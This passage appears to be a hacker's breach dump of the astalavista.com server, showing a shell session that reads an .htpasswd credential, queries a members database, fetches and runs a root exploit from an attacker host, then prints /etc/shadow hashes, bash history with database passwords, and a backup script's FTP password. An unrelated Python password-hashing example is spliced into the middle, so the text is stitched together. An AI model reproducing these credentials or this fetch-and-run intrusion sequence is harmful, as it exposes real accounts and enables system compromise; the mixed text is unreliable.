  868. sh-3.2$ cd member
  869. sh-3.2$ ls -la
  870. total 20
  871. drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
  872. drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
  873. -rw-r--r-- 1 astanet astanet 19 Jan 13 14:02 .htaccess
  874. -rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
  875. sh-3.2$ cat .htaccess
  876. SecFilterEngine off
  877.  
  878. sh-3.2$ cd ..
  879. sh-3.2$ cd cron
  880. sh-3.2$ ls -la
  881. total 168
  882. drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
  883. drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
  884. -rw-r--r-- 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
  885. -rw-r--r-- 1 astanet astanet 2356 Aug 11 2006 0_functions.php
  886. -rw-r--r-- 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
  887. -rw-r--r-- 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
  888. -rw-r--r-- 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
  889. -rw-r--r-- 1 astanet astanet 432 Aug 11 2006 1_weekly.php
  890. -rw-r--r-- 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
  891. -rw-r--r-- 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
  892. -rw-r--r-- 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
  893. -rw-r--r-- 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
  894. -rw-r--r-- 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
  895. -rw-r--r-- 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
  896. -rw-r--r-- 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
  897. -rw-r--r-- 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
  898. -rw-r--r-- 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
  899. -rw-r--r-- 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
  900. -rw-r--r-- 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
  901. -rw-r--r-- 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
  902. drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
  903. -rw-r--r-- 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
  904. -rw-r--r-- 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
  905.  
  906. sh-3.2$ cd ..
  907. sh-3.2$ cd _007
  908. sh-3.2$ ls -la
  909. total 24
  910. drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
  911. drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
  912. -rw-r--r-- 1 astanet astanet 96 Dec 23 15:17 .htaccess
  913. -rw-r--r-- 1 astanet astanet 3263 Jan 15 2007 index.php
  914. -rw-r--r-- 1 astanet astanet 20 Dec 27 2006 info.php
  915. drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
  916.  
  917. sh-3.2$ cat .htaccess
  918. authType Basic
  919. authName Admin
  920. authUserFile /home/astanet/auth/.htadm_pwd
  921. require valid-user
  922.  
  923. sh-3.2$ cat /home/astanet/auth/.htadm_pwd
  924. admin2net:CR0bl65MwhfT
  925.  
  926. sh-3.2$ mysql -u astanet_db -p
  927. Enter password:
  928. Welcome to the MySQL monitor. Commands end with ; or \g.
  929. Your MySQL connection id is 275153
  930. Server version: 5.0.45-community-log MySQL Community Edition (GPL)
  931.  
  932. Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
  933.  
  934. mysql> show databases;
  935. +-----------------------+
  936. | Database |
  937. +-----------------------+
  938. | information_schema |
  939. | astanet_ads |
  940. | astanet_mailing_lists |
  941. | astanet_mediawiki |
  942. | astanet_membersystem |
  943. | test |
  944. +-----------------------+
  945. 6 rows in set (0.00 sec)
  946.  
  947. mysql> use astanet_membersystem
  948. Database changed
  949. mysql> show tables;
  950. +-----------------------------------+
  951. | Tables_in_astanet_membersystem |
  952. +-----------------------------------+
  953. | blacklist_categories |
  954. | blacklist_content |
  955. | blacklist_levels |
  956. | blacklist_mcset |
  957. | dir_categories |
  958. | dir_comments |
  959. | dir_links |
  960. | dir_temp |
  961. | dir_votes |
  962. | documents |
  963. | documents_categories |
  964. | email_content |
  965. | email_settings |
  966. | exploits |
  967. | exploits_categories |
  968. | exploittree_categories |
  969. | exploittree_exploits |
  970. | home_values |
  971. | iso_countries |
  972. | links_categories |
  973. | links_records |
  974. | links_unauth |
  975. | links_votes |
  976. | log |
  977. | news_categories |
  978. | news_comments |
  979. | news_emoticons |
  980. | news_latest |
  981. | news_messages |
  982. | news_statistics |
  983. | news_votes |
  984. | prices_content |
  985. | prices_offers |
  986. | rss_settings |
  987. | sessions |
  988. | stats_signups |
  989. | u2u2 |
  990. | u2u_contact |
  991. | u2u_settings |
  992. | user_keywords_selected_categories |
  993. | users |
  994. | users_ipn_test |
  995. | users_keyword_values |
  996. | users_profile |
  997. | users_temp |
  998. | users_upgrade |
  999. +-----------------------------------+
  1000. 46 rows in set (0.00 sec)
  1001.  
  1002. mysql> describe users;
  1003. +--------------------------+--------------------------------------+------+-----+---------------------+----------------+
  1004. | Field | Type | Null | Key | Default | Extra |
  1005. +--------------------------+--------------------------------------+------+-----+---------------------+----------------+
  1006. | primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
  1007. | user | varchar(50) | NO | | | |
  1008. | nickname | varchar(30) | NO | MUL | anonymous | |
  1009. | password | varchar(30) | NO | | | |
  1010. | userlevel | tinyint(3) | YES | MUL | NULL | |
  1011. | exp | int(8) unsigned | NO | | 0 | |
  1012. | email | varchar(50) | NO | | | |
  1013. | ip | varchar(15) | NO | | 0 | |
  1014. | proxy | set('0','1') | NO | | 0 | |
  1015. | logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
  1016. | login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
  1017. | anz_in | tinyint(1) | NO | | -1 | |
  1018. | status | tinyint(1) unsigned | NO | | 0 | |
  1019. | checked | set('0','1','2') | NO | | 0 | |
  1020. | freemember | set('0','1') | NO | | 0 | |
  1021. | ordertype | set('transfer','wp','pp','mc','CnB') | YES | | NULL | |
  1022. | lang | tinytext | NO | | | |
  1023. | adid | smallint(6) | NO | | 0 | |
  1024. | pp_txn_id | varchar(255) | YES | | NULL | |
  1025. | cnb_transaction_id | varchar(255) | YES | | NULL | |
  1026. | cnb_order_id | varchar(255) | YES | | NULL | |
  1027. | cnb_user_id | int(11) | YES | | 0 | |
  1028. +--------------------------+--------------------------------------+------+-----+---------------------+----------------+
  1029. 22 rows in set (0.01 sec)
  1030.  
  1031. mysql> select count(*) as skids from users;
  1032. +-------+
  1033. | skids |
  1034. +-------+
  1035. | 25199 |
  1036. +-------+
  1037. 1 row in set (0.00 sec)
  1038.  
  1039. mysql> select user,nickname,password,email from users where userlevel = 1;
  1040. +--------------------------+----------------------+------------------+-----------------------------------+
  1041. | user | nickname | password | email |
  1042. +--------------------------+----------------------+------------------+-----------------------------------+
  1070. +--------------------------+----------------------+------------------+-----------------------------------+
  1071. 27 rows in set (0.00 sec)
  1072.  
  1073. mysql> exit;
  1074. Bye
  1075.  
  1076. [~] plaintext passwords? yes,
  1077. Those so-called "security professionals" who charge you $6.66 / month to
  1078. register at their hack-proof portal, save your passwords in plaintext...
  1079. brilliant!
  1080.  
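
The two storage failures shown in this dump (a plaintext `password varchar(30)` column here, and identical hash values for the `system` and `schmid` accounts in the earlier table) are both addressed by per-user salted, slow hashing. The following Python is an added example, not part of the original paste or the site's code; it migrates a plaintext column to scrypt records. The SQLite schema, account names, passwords and cost parameters are constructed assumptions.

```python
import hashlib
import hmac
import os
import sqlite3

# Cost parameters are assumptions for this example; tune them for your hardware.
N, R, P, DKLEN = 2**14, 8, 1, 32
MAXMEM = 64 * 1024 * 1024  # headroom above the ~16 MiB scrypt needs at N=2**14, r=8


def hash_password(password):
    """Return 'scrypt$N$r$p$salt_hex$hash_hex' using a fresh 16-byte random salt."""
    salt = os.urandom(16)
    dk = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                        n=N, r=R, p=P, maxmem=MAXMEM, dklen=DKLEN)
    return "$".join(["scrypt", str(N), str(R), str(P), salt.hex(), dk.hex()])


def verify_password(password, record):
    """Recompute the hash with the stored salt and parameters; compare in constant time."""
    try:
        scheme, n, r, p, salt_hex, hash_hex = record.split("$")
        if scheme != "scrypt":
            return False
        expected = bytes.fromhex(hash_hex)
        dk = hashlib.scrypt(password.encode("utf-8"), salt=bytes.fromhex(salt_hex),
                            n=int(n), r=int(r), p=int(p),
                            maxmem=MAXMEM, dklen=len(expected))
    except (ValueError, AttributeError):
        return False  # malformed or missing record
    return hmac.compare_digest(dk, expected)


# Hashed once at import so unknown nicknames cost the same work as known ones.
DUMMY_RECORD = hash_password("placeholder-for-timing-only")


def build_demo_db():
    """Constructed stand-in for the dumped schema: plaintext in users.password."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (primary_key INTEGER PRIMARY KEY, "
                 "nickname TEXT NOT NULL, password VARCHAR(30) NOT NULL)")
    conn.executemany("INSERT INTO users (nickname, password) VALUES (?, ?)",
                     [("alice", "Example-pass-1"),
                      ("bob", "Example-pass-1"),    # same password as alice, on purpose
                      ("carol", "another$example")])
    conn.commit()
    return conn


def migrate_plaintext_column(conn):
    """Hash each plaintext password into a new column, then blank the old one.

    A record is 114 characters with these parameters, so it cannot fit the
    varchar(30) column. Returns the number of rows migrated; a second run
    migrates nothing.
    """
    cols = [row[1] for row in conn.execute("PRAGMA table_info(users)")]
    if "password_hash" not in cols:
        conn.execute("ALTER TABLE users ADD COLUMN password_hash TEXT")
    rows = conn.execute("SELECT primary_key, password FROM users "
                        "WHERE password_hash IS NULL").fetchall()
    for pk, plaintext in rows:
        conn.execute("UPDATE users SET password_hash = ?, password = '' "
                     "WHERE primary_key = ?", (hash_password(plaintext), pk))
    conn.commit()
    return len(rows)


def check_login(conn, nickname, password):
    """Look up the stored record by nickname and verify the supplied password."""
    row = conn.execute("SELECT password_hash FROM users WHERE nickname = ?",
                       (nickname,)).fetchone()
    if row is None or row[0] is None:
        verify_password(password, DUMMY_RECORD)  # equalise timing, discard result
        return False
    return verify_password(password, row[0])


if __name__ == "__main__":
    db = build_demo_db()
    print("migrated rows:", migrate_plaintext_column(db))
    for nick, pw, rec in db.execute(
            "SELECT nickname, password, password_hash FROM users"):
        print(nick, repr(pw), rec[:40] + "...")
    print("alice login ok:", check_login(db, "alice", "Example-pass-1"))
```

Blanking the column does not remove plaintext from existing backups or SQL dumps, such as the `.sql` files visible in the directory listings; those have to be rotated or destroyed separately.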
  1081.  
  1082. [~] This has been fun, but we want more.
  1083.  
  1084. sh-3.2$ uname -a
  1085. Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
  1086. sh-3.2$ wget http://anti.sec.labs/g0troot
  1087. --13:33:37-- http://anti.sec.labs/g0troot
  1088. Resolving anti.sec.labs... 13.33.33.37
  1089. Connecting to anti.sec.labs|13.33.33.37|:80... connected.
  1090. HTTP request sent, awaiting response... 200 OK
  1091. Length: 18200 (18K) [text/plain]
  1092. Saving to: `g0troot'
  1093.  
  1094. 100%[=========================================================================================================================================>] 18,200 58.6K/s in
  1095. 0.3s
  1096.  
  1097. 18:55:14 (58.6 KB/s) - `g0troot' saved [18200/18200]
  1098.  
  1099. sh-3.2$ ./g0troot -i x86_64
  1100. [+] g0troot - anti.sec.labs
  1101. [+] Target: 2.6.18-128.1.10.el5
  1102. [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
  1103.  
  1104. [+] r00tr00t
  1105. [~] Executing shell...
  1106.  
  1107. sh-3.2# id
  1108. uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
  1109.  
  1110. sh-3.2# cat /etc/shadow
  1111. root:$1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
  1112. [snip]
  1113. admin:$1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
  1114. jon:$1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
  1115. com:$1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
  1116. astanet:$1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
  1117.  
  1118. sh-3.2# cat /etc/motd
  1119. #####################################################
  1120. #____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
  1121. # |__| [__ | |__| | |__| | | | [__ | |__| #
  1122. # | | ___] | | | |___ | | \/ | ___] | | | #
  1123. # #
  1124. #####################################################
  1125. # #
  1126. # Admin Contact - support@secureservertech.com #
  1127. # #
  1128. # Available ShortCuts #
  1129. # #
  1130. # nst - list active connections #
  1131. # ddos - shows how many times each ip is connected #
  1132. # ltr - restart the webserver #
  1133. # phpc - edit the php config file #
  1134. # htc - edit the webserver configuration file #
  1135. # up - uptime #
  1136. # etd - edit the motd of the day file #
  1137. # htr - start and restart apache if needed #
  1138. # syng - shows active SYN_RECV connections #
  1139. # synd - syn flood blocker - "synd -h" for usage #
  1140. #####################################################
  1141. # NOTES: #
  1142. # Last Upgrade - 12-08-2008 by JF #
  1143. # My.cnf/Mysql Optimization - 1-28-09 #
  1144. # #
  1145. # #
  1146. # #
  1147. #####################################################
  1148.  
  1149. sh-3.2# lastlog | grep -v Never
  1150. Username Port From Latest
  1151. root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
  1152. admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
  1153. com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
  1154. astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
  1155.  
  1156. sh-3.2# ls -la
  1157. total 453376
  1158. drwxr-x--- 15 root root 4096 Jun 4 08:40 .
  1159. drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
  1160. -rw-r--r-- 1 root root 2394400 Oct 19 2007 10mbtest.zip
  1161. -rw------- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
  1162. -rw------- 1 root root 16836 Jun 4 07:21 .bash_history
  1163. -rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
  1164. -rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
  1165. -rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
  1166. -rwx------ 1 root root 1899 Oct 28 2007 bk.sh
  1167. -rw-r--r-- 1 root root 1327 Nov 29 2007 cert
  1168. -rw-r--r-- 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
  1169. drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
  1170. -rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
  1171. -rw-r--r-- 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
  1172. drwx------ 2 root root 4096 Oct 28 2007 .elinks
  1173. drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
  1174. -rw-r--r-- 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
  1175. -rw------- 1 root root 0 Apr 16 13:19 .history
  1176. -rw-r--r-- 1 root root 16095 Sep 11 2007 install.log
  1177. -rw-r--r-- 1 root root 2566 Sep 11 2007 install.log.syslog
  1178. -rw-r--r-- 1 root root 1003 Jul 22 2007 install.sh
  1179. -rw------- 1 root root 35 Jun 2 14:23 .lesshst
  1180. drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
  1181. drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
  1182. -rw-r--r-- 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
  1183. -rw-r--r-- 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
  1184. -rwx------ 1 root root 760 Sep 18 2008 lp
  1185. drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
  1186. -rw-r--r-- 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
  1187. -rw-r--r-- 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
  1188. drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
  1189. -rw-r--r-- 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
  1190. drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
  1191. -rw-r--r-- 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
  1192. -rw-r--r-- 1 root root 25316 Feb 15 2006 mybk.sh
  1193. -rw------- 1 root root 41 Oct 19 2007 .my.cnf
  1194. -rw------- 1 root root 2902 Jun 4 08:40 .mysql_history
  1195. -rwx------ 1 root root 38873 Apr 16 2008 mysqlreport
  1196. -rw------- 1 root root 41 May 20 2008 .mytop
  1197. drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
  1198. -rw-r--r-- 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
  1199. drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
  1200. -rw------- 1 root root 1462 Sep 21 2007 opt.php
  1201. -rw-r--r-- 1 root root 3371 Sep 22 2007 p
  1202. -rw-r--r-- 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
  1203. -rw------- 1 root root 1024 Feb 3 21:32 .rnd
  1204. -rw-r--r-- 1 root root 716 Nov 28 2007 server.csr
  1205. -rw-r--r-- 1 root root 887 Nov 28 2007 server.key
  1206. drwx------ 2 root root 4096 Oct 10 2008 .ssh
  1207. -rw-r--r-- 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
  1208. -rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
  1209. -rw-r--r-- 1 root root 104874307 Oct 17 2007 test100.zip
  1210. -rw-r--r-- 1 root root 67085540 Oct 19 2007 test100.zip.1
  1211. drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
  1212. -rw-r--r-- 1 root root 42596 May 21 2007 tuning-primer.sh
  1213. drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
  1214. -rw-r--r-- 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
  1215. -rw------- 1 root root 12997 May 16 2008 .viminfo
  1216.  
  1217. sh-3.2# cat .bash_history
  1218. [snip]
  1219. wget cp4sst.com/sstlinux.tar.gz
  1220. tar zxvf sstlinux.tar.gz
  1221. cd linux-2.6.27.10
  1222. sh install.sh
  1223. make bzImage ; make modules ; make modules_install ; make install
  1224. make clean
  1225. service mysqld restart
  1226. [snip]
  1227. cd /usr/sbin/
  1228. chmod 4777 traceroute
  1229. chmod 4777 ping
  1230. traceroute -I www.astalavista.ch
  1231. [snip]
  1232. vi /etc/csf/csf.conf
  1233. traceroute google.ch
  1234. service csf restart
  1235. tracert google.ch
  1236. service csf restart
  1237. traceroute www.google.ch
  1238. tracert www.google.ch
  1239. traceroute www.google.ch
  1240. locate traceroute
  1241. chown 4755 /bin/traceroute
  1242. chown 4777 /bin/traceroute
  1243. locate ping
  1244. chown 4755 /bin/ping
  1245. chown 4777 /bin/ping
  1246. cd /bin/
  1247. ls -ali | grep ping
  1248. chown root ping
  1249. chmod 4755 ping
  1250. ls -ali | grep traceroute
  1251. chown root traceroute
  1252. chmod 4755 traceroute
  1253. ls -ali | grep traceroute
  1254. traceroute -I www.google.ch
  1255. traceroute www.google.ch
  1256. whois pmsantos.ch
  1257. [snip]
  1258. mysql -h com_contrexx2_live < /root/defaultp_ports.sql
  1259. mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
  1260. mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
  1261. mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
  1262. top
  1263. ping ssth.ch
  1264. ping asdlkfaljgasd???ljg???lasj.ch
  1265. ping asdlkfaljgasdlasj.ch
  1266. ping www.ssth.ch
  1267. ping ssth.ch
  1268. nslookup www.google.ch
  1269. nslookup www.ssth.ch
  1270. man nslookup
  1271. ping www.google.ch
  1272. nslookup www.google.ch
  1273. nslookup www.google.ch
  1274. nslookup salfjasdlf.ch
  1275. [snip]
  1276. openssl passwd -1 sadf
  1277. openssl passwd -1 5cZNHstdTy
  1278. mysql
  1279. mysql
  1280. locate proftp
  1281. vi /etc/proftpd.passwd
  1282. service proftpd restart
  1283. locate proftpd.conf
  1284. vi /etc/proftpd.conf
  1285. vi /etc/proftpd.passwd
  1286. service proftpd restart
  1287. [snip]
  1288. /bin/sh /home/com/backup_system/backup.sh
  1289. tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
  1290. mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
  1291. mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
  1292. ls -ali
  1293. mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
  1294. mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
  1295. crontab -l
  1296. crontab -l
  1297. php -q /home/com/public_html/modifications/cronjobs/securitynews.php
  1298. /home/com/public_html/modifications/cronjobs/exploits.sh
  1299. wget http://www.litespeedtech.com/packages/4.0/lsws-4.0.3-ent-x86_64-linux.tar.gz
  1300. tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
  1301. cd lsws-4.0.3
  1302. sh install.sh
  1303. uptime
  1304. hdparm -tt /dev/sda
  1305. iostat
  1306. yum install iostat
  1307. iostat
  1308. whereis iostat
  1309. yjm clean all
  1310. yum clean all ; yum -y update
  1311. iostat
  1312. yum install systat
  1313. rpm -qa | grep iostat
  1314. rpm -qa | grep sysstat
  1315. rpm -qa | grep systat
  1316. dmesg -c
  1317. sysctl -p
  1318. uname -r
  1319. cd /usr/src
  1320. wget nix101.com/kernels/sstlinux.tar.gz
  1321. shutdown -r now
  1322. nano -w /boot/grub/grub.conf
  1323.  
  1324. sh-3.2# cat .my.cnf
  1325. [client]
  1326. user=da_admin
  1327. password=X9dctmRH
  1328.  
  1329. sh-3.2# cat /home/com/backup_system/backup.sh
  1330. #!/bin/sh
  1331. #####################################################################
  1332. # #
  1333. # incremental backup for astalavista.com #
  1334. # #
  1335. # author: Paulo M. Santos <paulo.santos@astalavista.com> #
  1336. # #
  1337. #####################################################################
  1338. [snip]
  1339. PROG_DIR="/home/com/backup_system";
  1340. BACKUP_DIR="/home/com/backups";
  1341. DOBACKUP_FROM="/home/com/domains/astalavista.com/public_html";
  1342. # ftp for synology backup server
  1343. FTP_HOST="212.254.194.163";
  1344. FTP_PORT="21";
  1345. FTP_USER="astalavista.com";
  1346. FTP_PASS="yWHOJbzpWTWC6Xrmg1WnfBk5V";
  1347. FTP_DIR="/astalavista.com";
  1348. # database
  1349. DB_HOST="localhost";
  1350. DB_USER="contrexxuser2";
  1351. DB_PASS="0fEYNZgXz1pKe";
  1352. DB_DATABASE1="com_contrexx2_live";
  1353. DB_DATABASE2="com_contrexx2";
  1354. [snip]
  1355. ftp -in $FTP_HOST $FTP_PORT <<EOF
  1356. quote USER $FTP_USER
  1357. quote PASS $FTP_PASS
  1358. cd $FTP_DIR
  1359. put $DB_FULLNAME-SQL_Dump.tar
  1360. put $BACKUP_FULLNAME-Public_HTML.tar
  1361. close
  1362. bye
  1363. EOF
  1364.  
  1365. sh-3.2# cd /home
  1366. sh-3.2# ls -la
  1367. total 120
  1368. drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
  1369. drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
  1370. drwx--x--x 9 admin admin 4096 Nov 28 2007 admin
  1371. -rw------- 1 root root 8192 Jun 4 03:03 aquota.group
  1372. -rw------- 1 root root 8192 Jun 3 02:45 aquota.user
  1373. drwx--x--x 6 astanet astanet 4096 Jun 4 09:51 astanet
  1374. drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
  1375. drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
  1376. drwx--x--x 10 com com 4096 Apr 28 12:40 com
  1377. drwxr-xr-x 2 root root 4096 May 17 2007 ftp
  1378. drwx------ 3 jon jon 4096 Sep 21 2007 jon
  1379. drwx------ 2 root root 16384 Sep 11 2007 lost+found
  1380. drwxr-xr-x 2 root root 4096 Sep 14 2007 my
  1381. drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
  1382. drwx------ 2 jon jon 4096 Sep 15 2007 test
  1383. drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
  1384.  
  1385. sh-3.2# cd admin
  1386. sh-3.2# ls -la
  1387. total 1735896
  1388. drwx--x--x 9 admin admin 4096 Nov 28 2007 .
  1389. drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
  1390. drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
  1391. drwx------ 2 admin admin 4096 Sep 28 2007 backups
  1392. -rw------- 1 admin admin 860 Sep 17 2008 .bash_history
  1393. -rw-r--r-- 1 admin admin 24 Sep 14 2007 .bash_logout
  1394. -rw-r--r-- 1 admin admin 176 Sep 14 2007 .bash_profile
  1395. -rw-r--r-- 1 admin admin 124 Sep 14 2007 .bashrc
  1396. drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
  1397. drwx--x--x 6 admin admin 4096 Sep 21 2007 domains
  1398. drwxrwx--- 3 admin mail 4096 Sep 21 2007 imap
  1399. -rw-r--r-- 1 root root 24 Sep 21 2007 info.php
  1400. drwx------ 2 admin admin 4096 Sep 21 2007 mail
  1401. -rw-r--r-- 1 root root 716 Nov 28 2007 server.csr
  1402. -rw-r--r-- 1 root root 887 Nov 28 2007 server.key
  1403. -rw-r----- 1 admin mail 34 Sep 14 2007 .shadow
  1404. -rw-r----- 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
  1405. drwx--x--x 2 admin admin 4096 Jul 29 2008 user_backups
  1406.  
  1407. sh-3.2# ..
  1408. sh-3.2# cd jon
  1409. sh-3.2# ls -la
  1410. total 36
  1411. drwx------ 3 jon jon 4096 Sep 21 2007 .
  1412. drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
  1413. -rw------- 1 jon jon 53 Sep 21 2007 .bash_history
  1414. -rw-r--r-- 1 jon jon 24 Sep 21 2007 .bash_logout
  1415. -rw-r--r-- 1 jon jon 176 Sep 21 2007 .bash_profile
  1416. -rw-r--r-- 1 jon jon 124 Sep 21 2007 .bashrc
  1417. -rw-r--r-- 1 root root 24 Sep 21 2007 info.php
  1418. drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
  1419.  
  1420. sh-3.2# cd ..
  1421. sh-3.2# cd test
  1422. sh-3.2# ls -la
  1423. total 48
  1424. drwx------ 2 jon jon 4096 Sep 15 2007 .
  1425. drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
  1426. -rw--